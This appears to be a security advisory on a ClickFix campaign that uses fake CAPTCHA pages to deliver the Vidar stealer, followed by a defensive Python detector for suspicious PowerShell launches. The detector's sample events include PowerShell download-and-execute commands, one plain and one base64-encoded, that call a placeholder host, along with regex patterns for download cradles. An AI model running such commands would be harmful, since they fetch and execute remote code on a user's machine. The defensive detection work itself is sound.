ClickFix Social‑Engineering Campaign Delivers Vidar Stealer Malware to Australian Organizations
What Happened – The Australian Cyber Security Centre (ACSC) has identified an active “ClickFix” campaign that plants fake Cloudflare CAPTCHA prompts on compromised WordPress sites. The prompt presents a “verification step” that instructs the visitor to paste and run a PowerShell command themselves; that command downloads and executes the Vidar information stealer, which harvests browser credentials, cookies, cryptocurrency wallets and system details.
Why It Matters for TPRM –
- Compromise of a third‑party web platform (here, WordPress sites) turns a trusted vendor or partner property into the delivery point, exposing downstream staff to credential theft.
- Because the victim types the PowerShell command into a built‑in, signed interpreter, there is no exploit, attachment or dropped initial file for email and endpoint controls that key on those to catch; the first malicious action looks like user activity.
- Vidar self‑deletes after launch and runs from memory, so little remains on disk for forensic review, making detection and incident response harder.
Who Is Affected – Government agencies, critical infrastructure operators and any Australian enterprise that hosts WordPress‑based web properties (the compromise vector) or whose users browse to them (the victims).
Recommended Actions –
- Enforce PowerShell execution restrictions (Constrained Language Mode, script block and module logging) and enable application allow‑listing so that interpreters cannot launch arbitrary downloaded code.
- Harden WordPress installations: apply all core, theme and plugin patches, remove unused components, and monitor for unauthorized changes to pages and injected scripts.
- Deploy ACSC‑provided IoCs and monitor for “dead‑drop” C2 resolution: outbound requests from unexpected processes to Telegram, Steam and other public services that Vidar uses to look up its real C2 address.
Technical Notes – The attack relies on social engineering (a fake CAPTCHA) to get the user to run a PowerShell command that pulls the Vidar binary; the binary self‑deletes after launch and continues from memory. Vidar retrieves its C2 endpoints via dead‑drop URLs hosted on public platforms rather than hard‑coding them. No specific CVE is cited; the vector is a social‑engineering imitation of a legitimate verification flow, not a software flaw. Source: BleepingComputer
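The detection logic implied by the recommended actions and technical notes above, as an added example that is not part of the ACSC advisory or the BleepingComputer report: a heuristic scanner for ClickFix‑style PowerShell launches, run over constructed Sysmon‑style process‑creation records. The field names, the sample command lines, the user names and the host example.invalid are assumptions for illustration; the indicators themselves (a download cradle piped into an in‑memory execution sink, hidden‑window and policy‑bypass flags, an encoded command, and explorer.exe as the parent because the victim pastes the command into the Win+R Run dialog) are the generic ClickFix pattern rather than campaign‑specific IoCs.

```python
"""Added example (not from the ACSC advisory or the BleepingComputer report):
a heuristic detector for ClickFix-style PowerShell launches, run over
constructed Sysmon-style process-creation records. Field names, sample
command lines and the example.invalid host are assumptions for illustration."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # path of the created process
    parent_image: str   # path of the parent process
    command_line: str
    user: str


POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

# Download cradles used to pull a second stage (the stealer binary or a loader).
CRADLE = re.compile(r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer)\b")
# Sinks that execute what was fetched without a user-visible script file.
EXEC_SINK = re.compile(r"(?i)\b(iex|invoke-expression|start-process|saps)\b")
# Flags that hide the console window or disable policy/profile.
EVASION = re.compile(r"(?i)-(?:w|win|windowstyle)\s+h(?:idden)?\b|"
                     r"-(?:nop|noprofile)\b|-(?:ep|executionpolicy)\s+bypass\b")
# -EncodedCommand carries base64 of a UTF-16LE string; decode before scanning.
ENCODED = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if absent or undecodable."""
    m = ENCODED.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(ev: ProcEvent) -> list[str]:
    """Return indicator tags for one process-creation event (empty = nothing seen)."""
    if not ev.image.lower().endswith(POWERSHELL_IMAGES):
        return []
    tags: list[str] = []
    text = ev.command_line
    decoded = decode_encoded_command(text)
    if decoded:
        tags.append("encoded")
        text = f"{text} {decoded}"      # rescan the decoded script as well
    # ClickFix tells the victim to press Win+R and paste, so the PowerShell
    # process is a child of explorer.exe rather than of a browser or task host.
    if ev.parent_image.lower().endswith("explorer.exe"):
        tags.append("explorer-parent")
    if CRADLE.search(text):
        tags.append("cradle")
    if EXEC_SINK.search(text):
        tags.append("exec-sink")
    if EVASION.search(text):
        tags.append("evasion")
    return tags


def verdict(ev: ProcEvent) -> str:
    """ALERT on a download cradle plus any corroborating indicator,
    REVIEW on two weaker indicators, OK otherwise."""
    tags = classify(ev)
    if "cradle" in tags and len(tags) >= 2:
        return "ALERT"
    if len(tags) >= 2:
        return "REVIEW"
    return "OK"


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed encoded payload, standing in for what a ClickFix page puts on the clipboard.
ENCODED_PAYLOAD = "iex (irm http://example.invalid/verify)"
ENCODED_B64 = base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [   # constructed records, not real telemetry
    # 1. Plain-text ClickFix style: pasted into Win+R, fetches and runs a script in memory.
    ProcEvent(PS, r"C:\Windows\explorer.exe",
              "powershell -w hidden -nop -c \"iwr 'http://example.invalid/captcha.ps1' | iex\"",
              "CORP\\jsmith"),
    # 2. Same idea hidden behind -enc; the cradle is only visible after decoding.
    ProcEvent(PS, r"C:\Windows\System32\cmd.exe",
              f"powershell.exe -ep bypass -enc {ENCODED_B64}", "CORP\\jsmith"),
    # 3. Benign scheduled task run by the service host.
    ProcEvent(PS, r"C:\Windows\System32\svchost.exe",
              r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1",
              "NT AUTHORITY\\SYSTEM"),
    # 4. Interactive shell from explorer.exe with no cradle: the parent alone is not enough.
    ProcEvent(PS, r"C:\Windows\explorer.exe",
              "powershell.exe -NoExit -Command Get-ChildItem C:\\Users", "CORP\\jsmith"),
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS, 1):
        print(f"event {i}: {verdict(ev):6} {classify(ev)}")
```

The same conditions translate directly into a SIEM rule over Sysmon Event ID 1 or Windows Security Event ID 4688 with command‑line auditing enabled; the encoded‑command decoding is the step most often skipped, and without it the second sample above is invisible. When triaging a hit, the Run dialog history at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU shows what the user actually pasted, which matters here because the binary itself self‑deletes.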